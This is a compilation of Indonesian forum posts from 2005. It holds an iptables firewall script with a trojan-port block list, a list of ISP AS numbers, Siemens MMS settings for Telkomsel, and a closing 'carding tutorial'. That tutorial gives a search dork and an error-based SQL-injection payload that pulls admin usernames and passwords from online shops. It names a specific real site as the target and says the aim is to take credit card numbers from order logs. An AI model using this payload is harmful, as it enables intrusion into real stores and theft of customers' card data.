if [ "$EXTIP" = ´´ ]; then

echo "Aborting: Unable to determine the IP-address of $EXTIF !"

exit 1

fi

echo External IP: $EXTIP

## Determine external gateway

EXTGW=`route -n | grep -A 4 UG | awk ´{ print $2}´`

echo Default GW: $EXTGW

echo " --- "

### Internal Interface:

## Get internal interface from command-line

## If no interface is specified then set $DEFAULT_INTIF as INTIF

if [ "x$3" != "x" ]; then

INTIF=$3

else

INTIF=$DEFAULT_INTIF

fi

echo Internal Interface: $INTIF

## Determine internal IP

INTIP="`ifconfig $INTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"

if [ "$INTIP" = ´´ ]; then

echo "Aborting: Unable to determine the IP-address of $INTIF !"

exit 1

fi

echo Internal IP: $INTIP

## Determine internal netmask

INTMASK="`ifconfig $INTIF | grep Mask | cut -d : -f 4`"

echo Internal Netmask: $INTMASK

## Determine network address of the internal network

INTLAN=$INTIP´/´$INTMASK

echo Internal LAN: $INTLAN

echo ""

#----Load IPTABLES-modules-----#

#Insert modules- should be done automatically if needed

#If the IRC-modules are available, uncomment them below

echo "Loading IPTABLES modules"

dmesg -n 1 #Kill copyright display on module load

/sbin/modprobe ip_tables

/sbin/modprobe iptable_filter

/sbin/modprobe ip_conntrack

/sbin/modprobe ip_conntrack_ftp

/sbin/modprobe ip_nat_ftp

#/sbin/modprobe ip_conntrack_irc ports=$IRCPORTS

#/sbin/modprobe ip_nat_irc ports=$IRCPORTS

dmesg -n 6

echo " --- "

#----Clear/Reset all chains-----#

#Clear all IPTABLES-chains

#Flush everything, start from scratch

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

#Set default policies to DROP

$IPTABLES -P INPUT DROP

$IPTABLES -P OUTPUT DROP

$IPTABLES -P FORWARD DROP

#----Set network sysctl options-----#

echo "Setting sysctl options"

#Enable forwarding in kernel

echo 1 > /proc/sys/net/ipv4/ip_forward

#Disabling IP Spoofing attacks.

echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter

#Don´t respond to broadcast pings (Smurf-Amplifier-Protection)

echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Block source routing

echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route

#Kill timestamps

echo 0 > /proc/sys/net/ipv4/tcp_timestamps

#Enable SYN Cookies

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

#Kill redirects

echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

#Enable bad error message protection

echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#Log martians (packets with impossible addresses)

echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

#Set out local port range

echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range

#Reduce DoS´ing ability by reducing timeouts

echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout

echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time

echo 0 > /proc/sys/net/ipv4/tcp_window_scaling

echo 0 > /proc/sys/net/ipv4/tcp_sack

echo " --- "

echo "Creating user-chains"

#----Create logging chains-----#

##These are the logging-chains. They all have a certain limit of log-entries/sec to prevent logflooding

##The syslog-entries will be fireparse-compatible (see http://www.fireparse.com)

#Invalid packets (not ESTABLISHED,RELATED or NEW)

$IPTABLES -N LINVALID

$IPTABLES -A LINVALID -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix

"fp=INVALID:1 a=DROP "

$IPTABLES -A LINVALID -j DROP

#TCP-Packets with one ore more bad flags

$IPTABLES -N LBADFLAG

$IPTABLES -A LBADFLAG -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=BADFLAG:1 a=DROP "

$IPTABLES -A LBADFLAG -j DROP

#Logging of connection attempts on special ports (Trojan portscans, special services, etc.)

$IPTABLES -N LSPECIALPORT

$IPTABLES -A LSPECIALPORT -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=SPECIALPORT:1 a=DROP "

$IPTABLES -A LSPECIALPORT -j DROP

#Logging of possible TCP-SYN-Floods

$IPTABLES -N LSYNFLOOD

$IPTABLES -A LSYNFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=SYNFLOOD:1 a=DROP "

$IPTABLES -A LSYNFLOOD -j DROP

#Logging of possible Ping-Floods

$IPTABLES -N LPINGFLOOD

$IPTABLES -A LPINGFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=PINGFLOOD:1 a=DROP "

$IPTABLES -A LPINGFLOOD -j DROP

#All other dropped packets

$IPTABLES -N LDROP

$IPTABLES -A LDROP -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=TCP:1 a=DROP "

$IPTABLES -A LDROP -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=UDP:2 a=DROP "

$IPTABLES -A LDROP -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=ICMP:3 a=DROP "

$IPTABLES -A LDROP -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix

"fp=FRAGMENT:4 a=DROP "

$IPTABLES -A LDROP -j DROP

#All other rejected packets

$IPTABLES -N LREJECT

$IPTABLES -A LREJECT -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=TCP:1 a=REJECT "

$IPTABLES -A LREJECT -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=UDP:2 a=REJECT "

$IPTABLES -A LREJECT -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=ICMP:3 a=REJECT "

$IPTABLES -A LREJECT -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=FRAGMENT:4 a=REJECT "

$IPTABLES -A LREJECT -p tcp -j REJECT --reject-with tcp-reset

$IPTABLES -A LREJECT -p udp -j REJECT --reject-with icmp-port-unreachable

$IPTABLES -A LREJECT -j REJECT

#----Create Accept-Chains-----#

#TCPACCEPT - Check for SYN-Floods before letting TCP-Packets in

$IPTABLES -N TCPACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -m limit --limit $TCPSYNLIMIT --limit-burst

$TCPSYNLIMITBURST -j ACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -j LSYNFLOOD

$IPTABLES -A TCPACCEPT -p tcp ! --syn -j ACCEPT

#----Create special User-Chains-----#

#CHECKBADFLAG - Kill any Inbound/Outbound TCP-Packets with impossible flag-combinations

(Some port-scanners use these, eg. nmap Xmas,Null,etc.-scan)

$IPTABLES -N CHECKBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL FIN,URG,PSH -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL ALL -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL NONE -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,RST SYN,RST -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,FIN SYN,FIN -j LBADFLAG

#FILTERING FOR SPECIAL PORTS

#Inbound/Outbound SILENTDROPS/REJECTS (Things we don´t want in our Logs)

#SMB-Traffic

$IPTABLES -N SMB

$IPTABLES -A SMB -p tcp --dport 137 -j DROP

$IPTABLES -A SMB -p tcp --dport 138 -j DROP

$IPTABLES -A SMB -p tcp --dport 139 -j DROP

$IPTABLES -A SMB -p tcp --dport 445 -j DROP

$IPTABLES -A SMB -p udp --dport 137 -j DROP

$IPTABLES -A SMB -p udp --dport 138 -j DROP

$IPTABLES -A SMB -p udp --dport 139 -j DROP

$IPTABLES -A SMB -p udp --dport 445 -j DROP

$IPTABLES -A SMB -p tcp --sport 137 -j DROP

$IPTABLES -A SMB -p tcp --sport 138 -j DROP

$IPTABLES -A SMB -p tcp --sport 139 -j DROP

$IPTABLES -A SMB -p tcp --sport 445 -j DROP

$IPTABLES -A SMB -p udp --sport 137 -j DROP

$IPTABLES -A SMB -p udp --sport 138 -j DROP

$IPTABLES -A SMB -p udp --sport 139 -j DROP

$IPTABLES -A SMB -p udp --sport 445 -j DROP

#Inbound Special Ports

$IPTABLES -N SPECIALPORTS

#Deepthroat Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 6670 -j LSPECIALPORT

#Subseven Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 6711:6713 -j LSPECIALPORT

#Netbus Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 12345:12346 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 20034 -j LSPECIALPORT

#Back Orifice scan

$IPTABLES -A SPECIALPORTS -p udp --dport 31337:31338 -j LSPECIALPORT

#X-Win

$IPTABLES -A SPECIALPORTS -p tcp --dport $XWINPORTS -j LSPECIALPORT

#Hack´a´Tack 2000

$IPTABLES -A SPECIALPORTS -p udp --dport 28431 -j LSPECIALPORT

#ICMP/TRACEROUTE FILTERING

#Inbound ICMP/Traceroute

$IPTABLES -N ICMPINBOUND

#Ping Flood protection. Accept $PINGLIMIT echo-requests/sec, rest will be logged/dropped

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -m limit --limit $PINGLIMIT --

limit-burst $PINGLIMITBURST -j ACCEPT

#

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -j LPINGFLOOD

#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-reply -j LDROP

#Allow all other ICMP in

$IPTABLES -A ICMPINBOUND -p icmp -j ACCEPT

#Outbound ICMP/Traceroute

$IPTABLES -N ICMPOUTBOUND

#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-TTL-Expired

#MS Traceroute (MS uses ICMP instead of UDp for tracert)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-transit -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-reassembly -j LDROP

#Block ICMP-Parameter-Problem

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type parameter-problem -j LDROP

#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-reply -j LDROP

##Accept all other ICMP going out

$IPTABLES -A ICMPOUTBOUND -p icmp -j ACCEPT

#----End User-Chains-----#

echo " --- "

#----Start Ruleset-----#

echo "Implementing firewall rules..."

#################

## INPUT-Chain ## (everything that is addressed to the firewall itself)

#################

##GENERAL Filtering

# Kill INVALID packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A INPUT -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A INPUT -p tcp -j CHECKBADFLAG

##Packets FROM FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A INPUT -i lo -j ACCEPT

#

#Kill connections to the local interface from the outside world (--> Should be already catched by

kernel/rp_filter)

$IPTABLES -A INPUT -d 127.0.0.0/8 -j LREJECT

##Packets FROM INTERNAL NET

##Allow unlimited traffic from internal network using legit addresses to firewall-box

##If protection from the internal interface is needed, alter it

$IPTABLES -A INPUT -i $INTIF -s $INTLAN -j ACCEPT

#Kill anything from outside claiming to be from internal network (Address-Spoofing --> Should be

already catched by rp_filter)

$IPTABLES -A INPUT -s $INTLAN -j LREJECT

##Packets FROM EXTERNAL NET

##ICMP & Traceroute filtering

#Filter ICMP

$IPTABLES -A INPUT -i $EXTIF -p icmp -j ICMPINBOUND

#Block UDP-Traceroute

$IPTABLES -A INPUT -p udp --dport 33434:33523 -j LDROP

##Silent Drops/Rejects (Things we don´t want in our logs)

#Drop all SMB-Traffic

$IPTABLES -A INPUT -i $EXTIF -j SMB

#Silently reject Ident (Don´t DROP ident, because of possible delays when establishing an

outbound connection)

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 20 -j TCPACCEPT

# ftp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 21 -j TCPACCEPT

# ssh

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 22 -j TCPACCEPT

#telnet

#$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 23 -j TCPACCEPT

# smtp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 25 -j TCPACCEPT

# DNS

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 53 -j TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport 53 -j ACCEPT

# http

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 80 -j TCPACCEPT

# https

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 443 -j TCPACCEPT

# POP-3

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 110 -j TCPACCEPT

#SQUID

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 3128 -j TCPACCEPT

$IPTABLES -t nat -A PREROUTING -i $EXTIF -p tcp --dport 80 -j REDIRECT --to-port 3128

##Separate logging of special portscans/connection attempts

$IPTABLES -A INPUT -i $EXTIF -j SPECIALPORTS

##Allow ESTABLISHED/RELATED connections in

$IPTABLES -A INPUT -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j

TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j

ACCEPT

##Catch all rule

$IPTABLES -A INPUT -j LDROP

##################

## Output-Chain ## (everything that comes directly from the Firewall-Box)

##################

##Packets TO FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A OUTPUT -o lo -j ACCEPT

##Packets TO INTERNAL NET

#Allow unlimited traffic to internal network using legit addresses

$IPTABLES -A OUTPUT -o $INTIF -d $INTLAN -j ACCEPT

##Packets TO EXTERNAL NET

##ICMP & Traceroute

$IPTABLES -A OUTPUT -o $EXTIF -p icmp -j ICMPOUTBOUND

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A OUTPUT -o $EXTIF -j SMB

#Ident

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 20 -j ACCEPT

# ftp

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 21 -j ACCEPT

# ssh

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

#telnet

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 23 -m state --state ESTABLISHED -j ACCEPT

# smtp

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT

# DNS

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 53 -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -p udp --sport 53 -j ACCEPT

# http

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

# https

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

# POP-3

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT

# Squid

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 3128 -m state --state ESTABLISHED -j

ACCEPT

##Accept all tcp/udp traffic on unprivileged ports going out

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p tcp --sport $UNPRIVPORTS -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p udp --sport $UNPRIVPORTS -j ACCEPT

##Catch all rule

$IPTABLES -A OUTPUT -j LDROP

####################

## FORWARD-Chain ## (everything that passes the firewall)

####################

##GENERAL Filtering

#Kill invalid packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A FORWARD -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A FORWARD -p tcp -j CHECKBADFLAG

##Filtering FROM INTERNAL NET

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A FORWARD -o $EXTIF -j SMB

##Special Drops/Rejects

# - To be done -

##Filter for some Trojans communicating to outside

# - To be done -

##Port-Forwarding from Ports < 1024 [outbound] (--> Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -o $EXTIF -s $HTTPIP -p tcp --sport 80 -j ACCEPT

##Allow all other forwarding (from Ports > 1024) from Internal Net to External Net

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p tcp --sport $UNPRIVPORTS -j

ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p udp --sport $UNPRIVPORTS -j

ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p icmp -j ACCEPT

##Filtering FROM EXTERNAL NET

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A FORWARD -i $EXTIF -j SMB

##Allow replies coming in

$IPTABLES -A FORWARD -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED

-j TCPACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED

-j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p icmp -m state --state RELATED -j ACCEPT

##Port-Forwarding [inbound] (--> Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -i $EXTIF -p tcp -d $HTTPIP --dport 80 -j ACCEPT

#Battlecom-Forwarding

#$IPTABLES -A FORWARD -p tcp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p udp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p tcp --dport 47624 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

##Catch all rule/Deny every other forwarding

$IPTABLES -A FORWARD -j LDROP

################

## PREROUTING ##

################

##Port-Forwarding (--> Also see chain FORWARD)

##HTTP

#$IPTABLES -A PREROUTING -t nat -i $EXTIF -p tcp -d $EXTIP --dport 80 -j DNAT --to

$HTTPIP

##Battlecom

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 2300:2400 -i $EXTIF -j

DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p udp --destination-port 2300:2400 -i $EXTIF -j

DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 47624 -i $EXTIF -j

DNAT --to $BATTLECOMIP:47624

###################

## POSTROUTING ##

###################

#Masquerade from Internal Net to External Net

$IPTABLES -A POSTROUTING -t nat -o $EXTIF -j MASQUERADE

#------End Ruleset------#

echo "...done"

echo ""

echo "--> IPTABLES firewall loaded/activated <--"

##--------------------------------End Firewall---------------------------------##

;;

*)

echo "Usage: firewall (start|stop|restart|status) EXTIF INTIF"

exit 1

esac

exit 0

Menu tambahan

#############

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128

IDC (Cyber Building) IIX-JKT2 GCC (Telkom Building) IIX-JKT1

ISP AS Number Connection ISP AS Number Connection

- Jasatel AS 9785 FastEther - AccessNet AS 7587 Ethernet

- Starcall AS 9251 FastEther - RadNet AS 4434 Ethernet

- Nusanet AS 23679 FastEther - Centrin AS 9326 Ethernet

- Thamrin AS 23952 FastEther - Mahatel AS 7083 Ethernet

- Mitranet AS 23691 FastEther - Idola AS 4800 Ethernet

- IconPLN AS 9341 FastEther

- VIPnet AS 23698 FastEther Napinfo (Kuningan) IIX-JKT3

- Napsindo AS 17907 FastEther ISP AS Number Connection

- The.Net AS 10208 FastEther - Napinfo AS 17727 FastEther

- Gen.ID AS 23950 FastEther - Inter.net AS 18103 FastEther

- GerbangNet AS 18251 FastEther - Asianet AS 10114 FastEther

- Elga AS 23695 FastEther - Orbicom AS 23948 FastEther

- FirstAsia AS 23696 FastEther - Radnet AS 4434 FastEther

- EzyNet AS 18056 FastEther

- BNA AS 18189 FastEther

- TripleGate AS 17910 FastEther

- CSM AS 18379 FastEther

- Padinet AS 23756 FastEther

- Reach AS 4637 FastEther

- Uninet AS 17884 FastEther

- SatNet AS 17826 FastEther

- Multidata AS 18153 FastEther

- Melsa.net AS 9657 FastEther

- KSNet AS 18112 FastEther

- JavaNet AS 18393 FastEther

- IptekNet AS 3583 FastEther

- SpeedNet AS 9251 FastEther

- Patrakom AS 10137 FastEther

- Angkasa AS17450 FastEther

- Solusi AS 17995 FastEther

- GPNet AS 18394 FastEther

- SpotNet AS 4833 FastEther

- Jogjamedianet AS 23671 FastEther

- IPnet AS 18347 FastEther

- Rainbow AS 23945 FastEther

- Central AS 9228 FastEther

- Exelcom AS17885 FastEther

- UIInet AS 17996 FastEther

- BizNet AS 17451 FastEther

- Indika AS 23694 FastEther

- Quasar AS 18364 FastEther

- Eranet AS 17440 FastEther

- Easynet AS 23651 FastEther

- TopNet AS 23946 FastEther

- LinkNet AS 9905 FastEther

- InfoAsia AS 10220 FastEther

- Indonet AS 9340 FastEther

- CBN AS 4787 FastEther

- Indosat AS 4795 FastEther

- Visionnet AS 18237 FastEther

- Dnet AS 9794 FastEther

- Idola AS 4800 FastEther

- KadinNet Static FastEther

- Jalawave AS 23697 FastEther

- PSN AS 9875 FastEther

- Jetscom AS17671 FastEther

- Infokom AS17670 FastEther

- Bolehnet AS 9462 FastEther

- DTP AS18059 FastEther

- Kabelvision AS 23700 FastEther

- NTT Indonesia AS 10217 FastEther

- Satelindo AS 17922 FastEther

- Okenet AS 4832 FastEther

- TelkomNet AS 17974 FastEther

- PacificNet AS 4855 FastEther

- Infonet AS 2008 FastEther

- Asiakomnet AS 18052 FastEther

- Commercenet Static FastEther

- JII AS 17800 FastEther

- NAP Info AS 17727 FastEther

- AsiaNet AS 10114 FastEther

- Inter.net AS 18103 FastEther

- CityNet AS 17769 FastEther

- Radnet AS 4434 FastEther

- Centrin AS 9326 FastEther

- Bitnet AS 18156 FastEther

- IPTK AS 23699 FastEther

- Telkomsel AS 23693 FastEther

- Estiko AS 23692 Serial

- Qita Static Serial

- Sistelindo AS 2687 Serial

- PrimaNet AS 17658 Serial

- Internux Static Serial

- Teras AS 4821 Serial

- Circlecom AS 17538 Serial

Post by : No_Name on [ 26 October 2005 07:57:07 ]

Setting GPRS

Setting manual MMS via GPRS Telkomsel

Setting manual MMS via GPRS Telkomsel untuk Siemens A65, CF62, C60, M55, MC60, S55,

SL55

Langkah 1: Membuat Setting GPRS

1. Tekan Menu

2. Pilih Setup

3. Pilih Connectivity

4. Pilih GPRS lalu berikan tanda √

5. Pilih Data Services

6. Pilih MMS , WAP

7. Pilih 1 atau tempat lain

7a. Mengganti nama:

- Tekan Option

- Tekan Rename

- Masukkan : MMS Telkomsel

- Tekan Save

7b. Tekan Edit lalu Tekan Yes

8. Pilih GPRS Settings

8a. Berikan tanda √ pada GPRS Settings

8b. Pilih Edit

9. Isilah parameter sebagai berikut:

- APN : mms

- Login : wap

- Password : wap123

10. Tekan Save

11. Lanjutkan ke langkah 2

Langkah 2 : Setting MMS

1. Tekan Menu

2. Pilih Message

3. Pilih Msg. setup

4. Pilih MMS profiles

5. Pilih MMS atau tempat lainnya.

5a. Mengganti nama :

- Tekan Options

- Tekan Rename

- Masukkan : MMS Telkomsel

- Tekan OK

5b. Tekan Options, Tekan Change sett.

6. Isilah parameter sebagai berikut:

- Expiry time : Maximum

- Def. Priority : Normal

- Def. duration : 010.0

- Retrieval : Automatic

- MMS Relaysrv. : http://mms.telkomsel.com

- IP Settings : 010.001.089.150

Port : 9201

2 nd port dan 2 nd address tidak perlu diisi

- Conn. profile : Pilih MMS Telkomsel

7. Selesai

Post by : Siemens on [ 24 October 2005 11:23:47 ]

tutorial carding

Tutorial Carding by god_army

Disini saya mau berbagi sedikit tentang tutorial seputar carding yang mana menggunakan script

yang mengexploitasi terhadap web yang masih vuln terhadap script yang saya buat.

Sebenarnya script itu masih bisa di modifikasi lagi yah sesuai kebutuhan aza tapi itu terserah

saudara ... hehe..hehe.

Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari

di cari di google dengan keyword :

/shop/shopdisplayproducts.asp atau

shopdisplayproducts.asp

Kalo dah dapet web yang dah mau dijadiin target terus kita coba pake script ini --> ?cat=´%

20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%

20tbluser))--sp_password

Misalnya kita dapet target www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui

Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :

www.masih-vuln.com/shopdisplayproducts.asp?cat=´%20and%201=convert(int,(select%20top%

201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

Der apa yang terjadi ...? Kok gx ada yang terjadi malahan keluar

The page cannot be found

The page you are looking for might have been removed, had its name changed, or is temporarily

unavailable.

--------------------------------------------------------------------------------

Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh.

Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita

tinggal login pake username and password hasil temuan kita tadi.

Sebagai contoh web yang masih vuln adalah :

http://www.ilovesport.com.au jadinya :

http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat=´%20and%201=convert(int,

(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake

username ama password tersebut di

http://www.ilovesport.com.au/shop/admin.asp

hehehehe ... heheheheh

berhasil khan ....

abis itu masuk ke order lognya terus lo cari deh cartu creditnya disana.